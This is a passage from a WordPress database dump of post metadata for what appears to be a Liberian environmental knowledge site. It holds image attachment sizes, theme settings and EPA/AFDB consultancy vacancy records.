370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33635;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42422;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2026-01-26-at-18.25.56-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99695;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2026-01-26-at-18.25.56-1920x1080.jpeg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:235936;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-600x750.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:750;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67935;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61792;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2026-01-26-at-18.25.56-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102314;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:42:\"WhatsApp-Image-2026-01-26-at-18.25.56.jpeg\";}'),(38349,5735,'_thumbnail_id','5736'),(38350,5735,'_edit_last','38'),(38351,5735,'kava_extra_enable_breadcrumbs','inherit'),(38352,5735,'post_formats',''),(38353,5735,'gallery_tab',''),(38354,5735,'kava_extra_gallery_images',''),(38355,5735,'link_tab',''),(38356,5735,'kava_extra_link',''),(38357,5735,'kava_extra_link_target','_blank'),(38358,5735,'quote_tab',''),(38359,5735,'kava_extra_quote_text',''),(38360,5735,'kava_extra_quote_cite',''),(38361,5735,'audio_tab',''),(38362,5735,'kava_extra_audio',''),(38363,5735,'kava_extra_audio_loop','false'),(38364,5735,'kava_extra_audio_autoplay','false'),(38365,5735,'kava_extra_audio_preload','false'),(38366,5735,'video_tab',''),(38367,5735,'kava_extra_video_type','library'),(38368,5735,'kava_extra_video_library',''),(38369,5735,'kava_extra_video_external',''),(38370,5735,'kava_extra_video_poster',''),(38371,5735,'kava_extra_video_width','770'),(38372,5735,'kava_extra_video_height','480'),(38373,5735,'kava_extra_video_loop','false'),(38374,5735,'kava_extra_video_autoplay','false'),(38375,5735,'kava_extra_video_preload','false'),(38376,5738,'_edit_lock','1769460590:38'),(38377,5738,'_last_editor_used_jetpack','block-editor'),(38378,5739,'_wp_attached_file','2026/01/WhatsApp-Image-2026-01-26-at-10.10.14.jpeg'),(38379,5739,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:50:\"2026/01/WhatsApp-Image-2026-01-26-at-10.10.14.jpeg\";s:8:\"filesize\";i:372201;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20282;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2026-01-26-at-10.10.14-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194371;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7601;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115844;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2026-01-26-at-10.10.14-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:382279;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28967;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2026-01-26-at-10.10.14-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5206;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16002;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45493;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51447;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71547;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2026-01-26-at-10.10.14-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191461;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2026-01-26-at-10.10.14-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:424939;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74521;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-10.10.14-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105246;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2026-01-26-at-10.10.14-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198810;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38382,5738,'_thumbnail_id','5739'),(38383,5738,'_edit_last','38'),(38384,5738,'kava_extra_enable_breadcrumbs','inherit'),(38385,5738,'post_formats',''),(38386,5738,'gallery_tab',''),(38387,5738,'kava_extra_gallery_images',''),(38388,5738,'link_tab',''),(38389,5738,'kava_extra_link',''),(38390,5738,'kava_extra_link_target','_blank'),(38391,5738,'quote_tab',''),(38392,5738,'kava_extra_quote_text',''),(38393,5738,'kava_extra_quote_cite',''),(38394,5738,'audio_tab',''),(38395,5738,'kava_extra_audio',''),(38396,5738,'kava_extra_audio_loop','false'),(38397,5738,'kava_extra_audio_autoplay','false'),(38398,5738,'kava_extra_audio_preload','false'),(38399,5738,'video_tab',''),(38400,5738,'kava_extra_video_type','library'),(38401,5738,'kava_extra_video_library',''),(38402,5738,'kava_extra_video_external',''),(38403,5738,'kava_extra_video_poster',''),(38404,5738,'kava_extra_video_width','770'),(38405,5738,'kava_extra_video_height','480'),(38406,5738,'kava_extra_video_loop','false'),(38407,5738,'kava_extra_video_autoplay','false'),(38408,5738,'kava_extra_video_preload','false'),(38409,5741,'_last_editor_used_jetpack','classic-editor'),(38410,5741,'_edit_lock','1771842778:38'),(38411,5741,'_edit_last','38'),(38412,5741,'_wp_page_template','default'),(38413,5741,'closed_date','2026-02-26'),(38414,5741,'owner','EPA/AFDB'),(38415,5741,'vacancy_link',''),(38416,5743,'_wp_attached_file','2026/01/5a_reoi_international_consultants_to_develop_and_operationalize_an_automated_decision_management_system.pdf'),(38417,5743,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:261946;}'),(38418,5745,'_last_editor_used_jetpack','classic-editor'),(38419,5745,'_edit_lock','1771842447:38'),(38420,5745,'_edit_last','38'),(38421,5745,'_wp_page_template','default'),(38422,5745,'closed_date','2026-02-26'),(38423,5745,'owner','EPA/AFDB'),(38424,5745,'vacancy_link',''),(38425,5747,'_wp_attached_file','2026/01/4a_reoi_international_consultant_to_develop_a_policy_study_for_transforming_the_liberia_meteorological_and_hydrological_services_lmhs.pdf'),(38426,5747,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:248683;}'),(38427,5749,'_last_editor_used_jetpack','classic-editor'),(38428,5749,'_edit_lock','1771842303:38'),(38429,5749,'_edit_last','38'),(38430,5749,'_wp_page_template','default'),(38431,5749,'closed_date','2026-02-26'),(38432,5749,'owner','EPA/AFDB'),(38433,5749,'vacancy_link',''),(38434,5751,'_wp_attached_file','2026/01/3a_reoi_international_consultant_to_develop_the_portal_for_the_liberia_meteorological_and_hydrological_services_lmhs.pdf'),(38435,5751,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:265527;}'),(38436,5753,'_last_editor_used_jetpack','classic-editor'),(38437,5753,'_edit_lock','1771841813:38'),(38438,5753,'_edit_last','38'),(38439,5753,'_wp_page_template','default'),(38440,5753,'closed_date','2026-02-26'),(38441,5753,'owner','EPA/AFDB'),(38442,5753,'vacancy_link',''),(38443,5755,'_wp_attached_file','2026/01/2a_reoi_international_consultant_to_develop_climate_hazards_assessments_and_a_national_climate_information_database.pdf'),(38444,5755,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:281048;}'),(38445,5757,'_last_editor_used_jetpack','classic-editor'),(38446,5757,'_edit_lock','1771841470:38'),(38447,5757,'_edit_last','38'),(38448,5757,'_wp_page_template','default'),(38449,5757,'closed_date','2026-02-26'),(38450,5757,'owner','EPA/AFDB'),(38451,5757,'vacancy_link',''),(38452,5759,'_wp_attached_file','2026/01/1a_reoi_international_consultant_to_develop_guidelines_for_streamlining_meteorological_and_hydrological.pdf'),(38453,5759,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:261512;}'),(38454,5761,'_last_editor_used_jetpack','classic-editor'),(38455,5761,'_edit_lock','1769614777:38'),(38456,5761,'_edit_last','38'),(38457,5762,'_edit_lock','1769610854:38'),(38458,5762,'_last_editor_used_jetpack','block-editor'),(38459,5763,'_wp_attached_file','2026/01/cis.jpeg'),(38460,5763,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:16:\"2026/01/cis.jpeg\";s:8:\"filesize\";i:409466;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"cis-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21541;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"cis-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194336;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"cis-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8249;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"cis-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117693;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"cis-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:380067;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"cis-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30536;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:15:\"cis-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5496;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:16:\"cis-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17332;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:16:\"cis-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47757;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:16:\"cis-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53277;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:16:\"cis-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73133;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:17:\"cis-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191959;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:18:\"cis-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:418414;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:16:\"cis-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76326;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:16:\"cis-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108044;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:17:\"cis-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:201340;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38463,5762,'_thumbnail_id','5763'),(38464,5762,'_edit_last','38'),(38465,5762,'kava_extra_enable_breadcrumbs','inherit'),(38466,5762,'post_formats',''),(38467,5762,'gallery_tab',''),(38468,5762,'kava_extra_gallery_images',''),(38469,5762,'link_tab',''),(38470,5762,'kava_extra_link',''),(38471,5762,'kava_extra_link_target','_blank'),(38472,5762,'quote_tab',''),(38473,5762,'kava_extra_quote_text',''),(38474,5762,'kava_extra_quote_cite',''),(38475,5762,'audio_tab',''),(38476,5762,'kava_extra_audio',''),(38477,5762,'kava_extra_audio_loop','false'),(38478,5762,'kava_extra_audio_autoplay','false'),(38479,5762,'kava_extra_audio_preload','false'),(38480,5762,'video_tab',''),(38481,5762,'kava_extra_video_type','library'),(38482,5762,'kava_extra_video_library',''),(38483,5762,'kava_extra_video_external',''),(38484,5762,'kava_extra_video_poster',''),(38485,5762,'kava_extra_video_width','770'),(38486,5762,'kava_extra_video_height','480'),(38487,5762,'kava_extra_video_loop','false'),(38488,5762,'kava_extra_video_autoplay','false'),(38489,5762,'kava_extra_video_preload','false'),(38490,5761,'_wp_page_template','default'),(38491,5761,'closed_date','2026-01-07'),(38492,5761,'owner','EPA'),(38493,5761,'vacancy_link',''),(38494,5766,'_wp_attached_file','2026/01/Terms-of-Reference-GEF-PROJECT-ALIGNMENT.docx'),(38495,5766,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:62780;}'),(38603,84,'_elementor_css','a:6:{s:4:\"time\";i:1770871865;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:1;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(38497,5769,'_edit_lock','1770161155:38'),(38498,5769,'_last_editor_used_jetpack','block-editor'),(38501,5769,'_thumbnail_id','5594'),(38502,5769,'_edit_last','38'),(38503,5769,'kava_extra_enable_breadcrumbs','inherit'),(38504,5769,'post_formats',''),(38505,5769,'gallery_tab',''),(38506,5769,'kava_extra_gallery_images',''),(38507,5769,'link_tab',''),(38508,5769,'kava_extra_link',''),(38509,5769,'kava_extra_link_target','_blank'),(38510,5769,'quote_tab',''),(38511,5769,'kava_extra_quote_text',''),(38512,5769,'kava_extra_quote_cite',''),(38513,5769,'audio_tab',''),(38514,5769,'kava_extra_audio',''),(38515,5769,'kava_extra_audio_loop','false'),(38516,5769,'kava_extra_audio_autoplay','false'),(38517,5769,'kava_extra_audio_preload','false'),(38518,5769,'video_tab',''),(38519,5769,'kava_extra_video_type','library'),(38520,5769,'kava_extra_video_library',''),(38521,5769,'kava_extra_video_external',''),(38522,5769,'kava_extra_video_poster',''),(38523,5769,'kava_extra_video_width','770'),(38524,5769,'kava_extra_video_height','480'),(38525,5769,'kava_extra_video_loop','false'),(38526,5769,'kava_extra_video_autoplay','false'),(38527,5769,'kava_extra_video_preload','false'),(38528,5771,'_last_editor_used_jetpack','classic-editor'),(38529,5771,'_edit_lock','1770332098:38'),(38530,5771,'_edit_last','38'),(38531,5772,'_wp_attached_file','2026/02/FINAL-ESIA-REMAWATL-PROJECT_-Clean-Copy_LWSC-PIU_27.01.2026.pdf'),(38532,5772,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:6952150;}'),(38533,5773,'_wp_attached_file','2026/02/Screenshot-2026-02-05-at-22.31.46.png'),(38534,5773,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1350;s:6:\"height\";i:1742;s:4:\"file\";s:45:\"2026/02/Screenshot-2026-02-05-at-22.31.46.png\";s:8:\"filesize\";i:448676;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47730;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-02-05-at-22.31.46-794x1024.png\";s:5:\"width\";i:794;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:470209;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14528;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-768x991.png\";s:5:\"width\";i:768;s:6:\"height\";i:991;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:295255;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-02-05-at-22.31.46-1190x1536.png\";s:5:\"width\";i:1190;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:760676;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75945;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-02-05-at-22.31.46-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9008;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38458;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75745;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117471;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:152391;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-02-05-at-22.31.46-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:297424;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-02-05-at-22.31.46-1350x1080.png\";s:5:\"width\";i:1350;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:377955;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-600x774.png\";s:5:\"width\";i:600;s:6:\"height\";i:774;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:158316;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-02-05-at-22.31.46-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:164005;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-02-05-at-22.31.46-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:272872;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38541,5771,'_wp_page_template','default'),(38542,5771,'download_link','https://ekmsliberia.info/wp-content/uploads/2026/02/FINAL-ESIA-REMAWATL-PROJECT_-Clean-Copy_LWSC-PIU_27.01.2026.pdf'),(38543,5771,'by','Forest & Environment Research Institute, Inc. (FERI)'),(38544,5771,'year','January 2026'),(38545,5771,'_pods_document_cover_image','a:1:{i:0;i:5773;}'),(38546,5771,'document_cover_image','5773'),(38547,5771,'_pods_attached_document','a:1:{i:0;i:5775;}'),(38548,5771,'attached_document','5775'),(38549,5778,'_edit_lock','1770759203:38'),(38550,5778,'_last_editor_used_jetpack','block-editor'),(38551,5779,'_wp_attached_file','2026/02/todaynew.jpeg'),(38552,5779,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:753;s:6:\"height\";i:538;s:4:\"file\";s:21:\"2026/02/todaynew.jpeg\";s:8:\"filesize\";i:59738;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"todaynew-300x214.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14819;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"todaynew-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6773;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"todaynew-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20671;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:20:\"todaynew-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4851;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"todaynew-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12805;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"todaynew-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29314;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"todaynew-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30184;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"todaynew-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43679;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"todaynew-600x429.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:429;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43549;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"todaynew-640x538.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55298;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38553,5780,'_wp_attached_file','2026/02/today-news.jpeg'),(38554,5780,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:914;s:6:\"height\";i:551;s:4:\"file\";s:23:\"2026/02/today-news.jpeg\";s:8:\"filesi